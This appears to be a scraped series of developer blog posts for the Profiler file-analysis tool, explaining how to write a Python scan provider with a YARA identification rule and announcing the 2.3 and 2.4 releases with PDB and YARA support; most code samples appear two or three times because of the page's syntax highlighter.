[TEST] label = Test scan provider ext = test2,test3 group = db file = Test.py allocator = allocator
[TEST]
label = Test scan provider
ext = test2,test3
group = db
file = Test.py
allocator = allocator

The name of the section has two purposes: it specifies the name of the format being supported (in this case ‘TEST’) and also the name of the extension, which automatically is associated to that format (in this case ‘.test’, case insensitive). The hard limit for format names is 9 characters for now, this may change in the future if more are needed. The label is the description. The ext parameter is optional and specifies additional extensions to be associated to the format. group specifies the type of file which is being supported; available groups are: img, video, audio, doc, font, exe, manexe, arch, db, sys, cert, script. file specifies the Python source file and allocator the function which returns a new instance of the scan provider class.

Let’s start with the allocator:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def allocator():
return TestScanProvider()
def allocator(): return TestScanProvider()
def allocator():
    return TestScanProvider()

It just returns a new instance of TestScanProvider, which is a class dervided from ScanProvider:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
class TestScanProvider(ScanProvider):
def __init__(self):
super(TestScanProvider, self).__init__()
self.obj = None
class TestScanProvider(ScanProvider): def __init__(self): super(TestScanProvider, self).__init__() self.obj = None
class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None

Every scan provider has some mandatory methods it must override, let’s begin with the first ones:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _clear(self):
self.obj = None
def _getObject(self):
return self.obj
def _initObject(self):
self.obj = TestObject()
self.obj.Load(self.getStream())
return self.SCAN_RESULT_OK
def _clear(self): self.obj = None def _getObject(self): return self.obj def _initObject(self): self.obj = TestObject() self.obj.Load(self.getStream()) return self.SCAN_RESULT_OK
    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK

_clear gives a chance to free internal resources when they’re no longer used. In Python this is not usually important as member objects will automatically be freed when their reference count reaches zero.

_getObject must return the internal instance of the object being parsed. This must return an instance of a CFFObject derived class.

_initObject creates the object instance and loads the data stream into it. In the sample above we assume it being successful. Otherwise, we would have to return SCAN_RESULT_ERROR. This method is not called by the main thread, so that it doesn’t block the UI during long parse operations.

Let’s take a look at the TestObject class:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
class TestObject(CFFObject):
def __init__(self):
super(TestObject, self).__init__()
self.SetObjectFormatName("TEST")
self.SetDefaultEndianness(ENDIANNESS_LITTLE)
class TestObject(CFFObject): def __init__(self): super(TestObject, self).__init__() self.SetObjectFormatName("TEST") self.SetDefaultEndianness(ENDIANNESS_LITTLE)
class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)

This is a minimalistic implementation of a CFFObject derived class. Usually it should contain at least an override of the CustomLoad method, which gives the opportunity to fail when the data stream is first loaded through the Load method. SetDefaultEndianness wouldn’t even be necessary, as every object defaults to little endian by default. SetObjectFormatName, on the other hand, is very important, as it sets the internal format name of the object.

Let’s now take a look at how we scan a file:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _startScan(self):
return self.SCAN_RESULT_OK
def _threadScan(self):
e = ScanEntryData()
e.category = SEC_Warn
e.type = CT_NativeCode
self.addEntry(e)
def _startScan(self): return self.SCAN_RESULT_OK def _threadScan(self): e = ScanEntryData() e.category = SEC_Warn e.type = CT_NativeCode self.addEntry(e)
    def _startScan(self):
        return self.SCAN_RESULT_OK
        
    def _threadScan(self):
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)

The code above will issue a single warning concerning native code. When _startScan returns SCAN_RESULT_OK, _threadScan will be called from a thread other than the main UI one. The logic behind this is that _startScan is actually called from the main thread and if the scan of the file doesn’t require complex operations, like in the case above, then the method could return SCAN_RESULT_FINISHED and then _threadScan won’t be called at all. During a threaded scan, an abort by the user can be detected via the isAborted method.

From the UI side point of view, when a scan entry is clicked in summary, the scan provider is supposed to return UI information.

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _scanViewData(self, xml, dnode, sdata):
if sdata.type == CT_NativeCode:
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData("Hello, world!")
return True
return False
def _scanViewData(self, xml, dnode, sdata): if sdata.type == CT_NativeCode: sdata.setViews(SCANVIEW_TEXT) sdata.data.setData("Hello, world!") return True return False
    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False

This will display a text field with a predefined content when the user clicks the scan entry in the summary. This is fairly easy, but what happens when we have several entries of the same type and need to differentiate between them? There’s where the data member of ScanEntryData plays a role, this is a string which will be included in the report xml and passed again back to _scanViewData as an xml node.

For instance:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
e.data = "<o>1234</o>"
e.data = "<o>1234</o>"
e.data = "1234"

Becomes this in the final XML report:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
<d>
<o>1234</o>
</d>
<d> <o>1234</o> </d>

    1234

The dnode argument of _scanViewData points to the ‘d’ node and its first child will be the ‘o’ node we passed. the xml argument represents an instance of the NTXml class, which can be used to retrieve the children of the dnode.

But this is only half of the story: some of the scan entries may represent embedded files (category SEC_File), in which case the _scanViewData method must return the data representing the file.

Apart from scan entries, we may also want the user to explore the format of the file. To do that we must return a tree representing the structure of our file:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _getFormat(self):
ft = FormatTree()
ft.enableIDs(True)
fi = ft.appendChild(None, 1)
ft.appendChild(fi, 2)
return ft
def _getFormat(self): ft = FormatTree() ft.enableIDs(True) fi = ft.appendChild(None, 1) ft.appendChild(fi, 2) return ft
    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft

The enableIDs method must be called right after creating a new FormatTree class. The code above creates a format item with id 1 with a child item with id 2, which results in the following:

Format tree

But of course, we haven’t specified neither labels nor different icons in the function above. This information is retrieved for each item when required through the following method:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _formatViewInfo(self, finfo):
if finfo.fid == 1:
finfo.text = "directory"
finfo.icon = PubIcon_Dir
return True
elif finfo.fid == 2:
finfo.text = "entry"
return True
return False
def _formatViewInfo(self, finfo): if finfo.fid == 1: finfo.text = "directory" finfo.icon = PubIcon_Dir return True elif finfo.fid == 2: finfo.text = "entry" return True return False
    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False

The various items are identified by their id, which was specified during the creation of the tree.

The UI data for each item is retrieved through the _formatViewData method:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def _formatViewData(self, sdata):
if sdata.fid == 1:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui>
def _formatViewData(self, sdata): if sdata.fid == 1: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui>
    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("
") sdata.setCallback(cb, None) return True return False

This will display a custom view with a table and a hex view separated by a splitter:

Custom view

Of course, also have specified the callback for our custom view:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
def cb(cv, ud, code, view, data):
if code == pvnInit:
return 1
return 0
def cb(cv, ud, code, view, data): if code == pvnInit: return 1 return 0
def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0

It is good to remember that format item IDs and IDs used in custom views are used to encode bookmark jumps. So if they change, saved bookmark jumps become invalid.

And here again the whole code for a better overview:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
from Pro.Core import *
from Pro.UI import pvnInit, PubIcon_Dir
class TestObject(CFFObject):
def __init__(self):
super(TestObject, self).__init__()
self.SetObjectFormatName("TEST")
self.SetDefaultEndianness(ENDIANNESS_LITTLE)
def cb(cv, ud, code, view, data):
if code == pvnInit:
return 1
return 0
class TestScanProvider(ScanProvider):
def __init__(self):
super(TestScanProvider, self).__init__()
self.obj = None
def _clear(self):
self.obj = None
def _getObject(self):
return self.obj
def _initObject(self):
self.obj = TestObject()
self.obj.Load(self.getStream())
return self.SCAN_RESULT_OK
def _startScan(self):
return self.SCAN_RESULT_OK
def _threadScan(self):
print("thread msg")
e = ScanEntryData()
e.category = SEC_Warn
e.type = CT_NativeCode
self.addEntry(e)
def _scanViewData(self, xml, dnode, sdata):
if sdata.type == CT_NativeCode:
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData("Hello, world!")
return True
return False
def _getFormat(self):
ft = FormatTree()
ft.enableIDs(True)
fi = ft.appendChild(None, 1)
ft.appendChild(fi, 2)
return ft
def _formatViewInfo(self, finfo):
if finfo.fid == 1:
finfo.text = "directory"
finfo.icon = PubIcon_Dir
return True
elif finfo.fid == 2:
finfo.text = "entry"
return True
return False
def _formatViewData(self, sdata):
if sdata.fid == 1:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui>
from Pro.Core import * from Pro.UI import pvnInit, PubIcon_Dir class TestObject(CFFObject): def __init__(self): super(TestObject, self).__init__() self.SetObjectFormatName("TEST") self.SetDefaultEndianness(ENDIANNESS_LITTLE) def cb(cv, ud, code, view, data): if code == pvnInit: return 1 return 0 class TestScanProvider(ScanProvider): def __init__(self): super(TestScanProvider, self).__init__() self.obj = None def _clear(self): self.obj = None def _getObject(self): return self.obj def _initObject(self): self.obj = TestObject() self.obj.Load(self.getStream()) return self.SCAN_RESULT_OK def _startScan(self): return self.SCAN_RESULT_OK def _threadScan(self): print("thread msg") e = ScanEntryData() e.category = SEC_Warn e.type = CT_NativeCode self.addEntry(e) def _scanViewData(self, xml, dnode, sdata): if sdata.type == CT_NativeCode: sdata.setViews(SCANVIEW_TEXT) sdata.data.setData("Hello, world!") return True return False def _getFormat(self): ft = FormatTree() ft.enableIDs(True) fi = ft.appendChild(None, 1) ft.appendChild(fi, 2) return ft def _formatViewInfo(self, finfo): if finfo.fid == 1: finfo.text = "directory" finfo.icon = PubIcon_Dir return True elif finfo.fid == 2: finfo.text = "entry" return True return False def _formatViewData(self, sdata): if sdata.fid == 1: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui>
from Pro.Core import *
from Pro.UI import pvnInit, PubIcon_Dir

class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)

def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0

class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK

    def _startScan(self):
        return self.SCAN_RESULT_OK
        
    def _threadScan(self):
        print("thread msg")
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False
        
    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft
        
    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False
        
    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("
") sdata.setCallback(cb, None) return True return False def allocator(): return TestScanProvider()

If you have noticed from the screen-shot above, the analysed file is called ‘a.t’ and as such doesn’t automatically associate to our ‘test’ format. So how does it associate anyway?

Clearly Profiler doesn’t rely on extensions alone to identify the format of a file. For external scan providers a signature mechanism based on YARA has been introduced. In the config directory of the user, you can create a file named ‘yara.plain’ and insert your identification rules in it, e.g.:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
rule test
{
strings:
$sig = "test"
condition:
$sig at 0
}
rule test { strings: $sig = "test" condition: $sig at 0 }
rule test
{
    strings:
        $sig = "test"

    condition:
        $sig at 0
}

This rule will identify the format as ‘test’ if the first 4 bytes of the file match the string ‘test’: the name of the rule identifies the format.

The file ‘yara.plain’ will be compiled to the binary ‘yara.rules’ file at the first run. In order to refresh ‘yara.rules’, you must delete it.

One important thing to remember is that a rule isn’t matched against an entire file, but only against the first 512 bytes.

Of course, our provider behaves 100% like all other providers and can be used to load embedded files:

Embedded files

Our new provider is used automatically when an embedded file is identified as matching our format.

Profiler 2.4

Profiler 2.4 is out with the following news:

added initial support for PDB files (including export of types)
added support for Windows Encoded Scripts (VBE, JSE)
– introduced fixed xml structures
added automatic string decoding in struct tables
added Python string command line execution
– remember the last selected logic group
– fixed missing support for wchar_t in C types
– updated Qt to 5.4.1
– various bug fixes

While the most important newly introduced feature is the support for PDB files, here are some interesting new features:

Support for Windows Encoded Scripts (VBE, JSE)

Windows encoded scripts like VBE and JSE files (the encoded variants of VBS and JS script files) are now supported and automatically decoded.

In the screen-shot you can see the decoded output of an encoded file (showed at the bottom).

Automatic string decoding in struct tables

A very basic feature: byte-arrays in structures are automatically checked for strings and in case decoded.

(notice the section name automatically displayed as ascii string)

Python string command line execution

Apart from executing script files passed as command line arguments, now it is also possible to execute Python statements directly passed as argument.

For instance:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"
cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"
cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"

The optional argument ‘-c’ specifies to not display the UI.

Enjoy!

PDB support (including export of types)

The main feature of the upcoming 2.4 version of Profiler is the initial support for the PDB format. Our code doesn’t rely on the Microsoft DIA SDK and thus works also on OS X and Linux.

Since the PDB format is undocumented, this task would’ve been extremely difficult without the fantastic work on PDBs of the never too much revered Sven B. Schreiber.

Let’s open a PDB file.

As you can see the streams in the PDB can be explored. The TPI stream (the one describing types) offers further inspection.

All the types contained in the PDB can be exported to a Profiler header by pressing Ctrl+R and executing the ‘Dump types to header’ action.

Now the types can be used from both the hex editor and the Python SDK.

We can explore the dumped header by using, as usual, the Header Manager tool.

The type showed above in the hex editor is simple. So let’s look what a more complex PDB type may look like.

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
<r id="CWnd" type="class" size="84">
<b>
<b type="CCmdTarget" offset="0" access="public">
</b>
<m id="_GetBaseClass" type="CRuntimeClass * ()">
<s id="classCWnd" type="CRuntimeClass const">
<m id="GetThisClass" type="CRuntimeClass * ()">
<m id="GetRuntimeClass" type="CRuntimeClass * ()">
<m id="CreateObject" type="CObject * ()">
<m id="GetCurrentMessage" type="tagMSG const * ()">
<f id="m_hWnd" type="HWND__ *" offset="32">
<m id="operator struct HWND__ *" type="HWND__ * ()">
<m id="operator==" type="int32 (CWnd const *)">
<m id="operator!=" type="int32 (CWnd const *)">
<m id="GetSafeHwnd" type="HWND__ * ()">
<m id="GetStyle" type="unsigned int ()">
<m id="GetExStyle" type="unsigned int ()">
<m id="ModifyStyle" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)">
<m id="ModifyStyle" type="int32 (unsigned int, unsigned int, uint32)">
<m id="ModifyStyleEx" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)">
<m id="ModifyStyleEx" type="int32 (unsigned int, unsigned int, uint32)">
<m id="GetOwner" type="CWnd * ()">
<m id="SetOwner" type="void (CWnd *)">
<m id="GetWindowInfo" type="int32 (tagWINDOWINFO *)">
<m id="GetTitleBarInfo" type="int32 (tagTITLEBARINFO *)">
<m id="CWnd" type="void (CWnd const *)">
<m id="CWnd" type="void (HWND__ *)">
<m id="CWnd" type="void ()">
<m id="FromHandle" type="CWnd * (HWND__ *)">
<m id="FromHandlePermanent" type="CWnd * (HWND__ *)">
<m id="DeleteTempMap" type="void ()">
<!-- etc. -->
</m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></f></m></m></m></m></s></m></b></r>
<r id="CWnd" type="class" size="84"> <b> <b type="CCmdTarget" offset="0" access="public"> </b> <m id="_GetBaseClass" type="CRuntimeClass * ()"> <s id="classCWnd" type="CRuntimeClass const"> <m id="GetThisClass" type="CRuntimeClass * ()"> <m id="GetRuntimeClass" type="CRuntimeClass * ()"> <m id="CreateObject" type="CObject * ()"> <m id="GetCurrentMessage" type="tagMSG const * ()"> <f id="m_hWnd" type="HWND__ *" offset="32"> <m id="operator struct HWND__ *" type="HWND__ * ()"> <m id="operator==" type="int32 (CWnd const *)"> <m id="operator!=" type="int32 (CWnd const *)"> <m id="GetSafeHwnd" type="HWND__ * ()"> <m id="GetStyle" type="unsigned int ()"> <m id="GetExStyle" type="unsigned int ()"> <m id="ModifyStyle" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"> <m id="ModifyStyle" type="int32 (unsigned int, unsigned int, uint32)"> <m id="ModifyStyleEx" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"> <m id="ModifyStyleEx" type="int32 (unsigned int, unsigned int, uint32)"> <m id="GetOwner" type="CWnd * ()"> <m id="SetOwner" type="void (CWnd *)"> <m id="GetWindowInfo" type="int32 (tagWINDOWINFO *)"> <m id="GetTitleBarInfo" type="int32 (tagTITLEBARINFO *)"> <m id="CWnd" type="void (CWnd const *)"> <m id="CWnd" type="void (HWND__ *)"> <m id="CWnd" type="void ()"> <m id="FromHandle" type="CWnd * (HWND__ *)"> <m id="FromHandlePermanent" type="CWnd * (HWND__ *)"> <m id="DeleteTempMap" type="void ()"> <!-- etc. --> </m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></f></m></m></m></m></s></m></b></r>

 
  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

The PDB code is also exposed to the SDK. This is a small snippet of code, which dumps all the types to a text buffer and then displays them in a text view.

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
from Pro.Core import *
from Pro.UI import *
from Pro.PDB import *
def showPDBTypes():
ctx = proContext()
out = proTextStream()
out.setIndentSize(4)
obj = ctx.currentScanProvider().getObject()
tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI)
tpihdr = obj.TPIHeader(tpi)
tiMin = tpihdr.Num("tiMin")
tiMax = tpihdr.Num("tiMax")
tctx = obj.CreateTypeContext(tpi)
for ti in range(tiMin, tiMax):
tctx.DumpType(out, ti)
view = ctx.createView(ProView.Type_Text, "PDB Test")
view.setLanguage("XML")
view.setText(out.buffer)
ctx.addView(view)
showPDBTypes()
from Pro.Core import * from Pro.UI import * from Pro.PDB import * def showPDBTypes(): ctx = proContext() out = proTextStream() out.setIndentSize(4) obj = ctx.currentScanProvider().getObject() tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI) tpihdr = obj.TPIHeader(tpi) tiMin = tpihdr.Num("tiMin") tiMax = tpihdr.Num("tiMax") tctx = obj.CreateTypeContext(tpi) for ti in range(tiMin, tiMax): tctx.DumpType(out, ti) view = ctx.createView(ProView.Type_Text, "PDB Test") view.setLanguage("XML") view.setText(out.buffer) ctx.addView(view) showPDBTypes()
from Pro.Core import *
from Pro.UI import *
from Pro.PDB import *

def showPDBTypes():
    ctx = proContext()
    out = proTextStream()
    out.setIndentSize(4)

    obj = ctx.currentScanProvider().getObject()
    tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI)
    tpihdr = obj.TPIHeader(tpi)
    tiMin = tpihdr.Num("tiMin")
    tiMax = tpihdr.Num("tiMax")
    tctx = obj.CreateTypeContext(tpi)
    for ti in range(tiMin, tiMax):
        tctx.DumpType(out, ti)

    view = ctx.createView(ProView.Type_Text, "PDB Test")
    view.setLanguage("XML")
    view.setText(out.buffer)
    ctx.addView(view)

showPDBTypes()

In order to dump all types to a single header, you can use the DumpAllToHeader method.

Profiler 2.3

Profiler 2.3 is out with the following news:

introduced YARA 3.2 support
added groups for logic providers
added Python action to encode/decode text
added Python action to strip XML down to text
added the possibility to choose the fixed font
added color randomization for structs and intervals
added close report and quit APIs
exposed more methods of the Report class (including save)
– improved indentation handling in the script editor
synchronized main and workspace output views
– improved output view
– updated libmagic to 5.21
– updated Capstone to 3.0
– many small improvements
– fixed libmagic on Linux
– removed the tray icon
– minor bug fixes

Logic provider groups

Logic providers can now be grouped in order to avoid clutter in the main window. Adding the following line to an existing logic provider will result in a new group being created:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
group = Extra
group = Extra
group = Extra

Encode/decode text action

A handy Python action to convert from hex to text and vice-versa using all of Python’s supported encodings. Place yourself in a hex or text view and run the encoding/decoding action ‘Bytes to text’ or ‘Text to bytes’.

The operation will open a new text or hex view depending if it was an encoding or a decoding.

XML to text action

Strips tags from an XML and displays only the text. The action can be performed both on a hex and text view.

And it will open a new text view. This is useful to view the text of a DOCX or ODT document. In the future the preview for these documents will be made available automatically, but in the meantime this action is helpful.

Fixed font preferences

The fixed font used in most views can now be chosen from the ‘General’ settings.

Struct/intervals color randomization

When adding a structure or interval to the hex view the chosen color is now being randomized every time the dialog shows up. This behaviour can be disabled from the dialog itself and it’s also possible to randomize again the color by clicking on the specific refresh button.

Manually picking a different color for every interval is time consuming and so this feature should speed up raw data analysis.

Report APIs

Most of the report APIs have been exposed (check out the SDK documentation). This combined with the newly introduced ‘quit’ SDK method can be used to perform custom scans programmatically and save the resulting report.

Here’s a small example which can be launched from the command line:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
from Pro.Core import *
import sys
ctx = proCoreContext()
def init():
ctx.getSystem().addFile(sys.argv[1])
return True
def rload():
ctx.unregisterLogicProvider("test_logic")
ctx.getReport().saveAs("auto.cpro")
ctx.quit()
ctx.registerLogicProvider("test_logic", init, None, None, None, rload)
ctx.startScan("test_logic")
from Pro.Core import * import sys ctx = proCoreContext() def init(): ctx.getSystem().addFile(sys.argv[1]) return True def rload(): ctx.unregisterLogicProvider("test_logic") ctx.getReport().saveAs("auto.cpro") ctx.quit() ctx.registerLogicProvider("test_logic", init, None, None, None, rload) ctx.startScan("test_logic")
from Pro.Core import *
import sys
 
ctx = proCoreContext()
 
def init():
    ctx.getSystem().addFile(sys.argv[1])
    return True
 
def rload():
    ctx.unregisterLogicProvider("test_logic")
    ctx.getReport().saveAs("auto.cpro")
    ctx.quit()
 
ctx.registerLogicProvider("test_logic", init, None, None, None, rload)
ctx.startScan("test_logic")

The command line syntax to run this script would be:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
cerpro -r scan.py [file to scan]
cerpro -r scan.py [file to scan]
cerpro -r scan.py [file to scan]

The UI will show up and close automatically once the ‘quit’ method is called. Running this script in console mode using the ‘-c’ parameter is not yet possible, because of the differences in message handling on different platforms, but it will be in the future.

Synchronized output views

The output view of the main window and of the workspace are now synchronized, thus avoiding missing important log messages being printed in one or the other context.

Enjoy!

YARA 3.2.0 support

The upcoming 2.3 version of Profiler includes support for the latest YARA engine. This new release is scheduled for the first week of January and it will include YARA on all supported platforms.

One inherent technical advantage of having YARA support in Profiler is that it will be possible to scan for YARA rules inside embedded files/objects, like files in a Zip archive, in a CHM file, in an OLEStream, streams in a PDF, etc.

The YARA engine itself has been compiled with all standard modules (except for cuckoo). Even the magic module is available, since libmagic is also supported by Profiler.

The initial YARA integration comes as a hook extension, an action and Python SDK support. The YARA Python support is the official one and differs from it only in the import statement. You can run existing YARA Python code without modification by using the following import syntax:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
import Pro.yara as yara
import Pro.yara as yara
import Pro.yara as yara

So let’s start a YARA scan. To do that, we need to enable the YARA hook extension. On Windows remember to configure Python in case you haven’t yet, since all extensions have been written in it.

When a scan is started, a YARA settings dialog will show up.

This dialog lets us choose various settings including the type of rules to load.

There are four possibilities. A simple text field containing YARA rules, a plain text rules file, a compiled rules file or a custom expression which must eval to a valid Rules object.

The report settings specify how we will be alerted of matches. The ‘only matches’ option makes sure that only files (or their sub-files) with a match will be included in the final report. The ‘add to meta-data” option causes the matches to be visible as meta-data strings of a file. The ‘as threats’ option reports every match as a 100% risk threat. The ‘print to output’ option prints the matches to the output view.

Since we had the ‘only matches’ option enabled, we will find only matching files in our final report.

And since we had also the ‘to meta-data’ option enabled, we will see the matches when opening a file in the workspace.

The YARA scan functionality comes also as an action when we find ourselves in a hex view. You can either scan the whole hex data or select a range. Then press Ctrl+R to run an action and select ‘YARA scan’.

In this case we won’t be given report options, since the only thing which can be performed is to print out matches in the output view.

Like this:

Of course, all supported platforms come also with the official YARA command line utility.

Since this has been a customer request for quite some time, I think it will be appreciated by some of our users.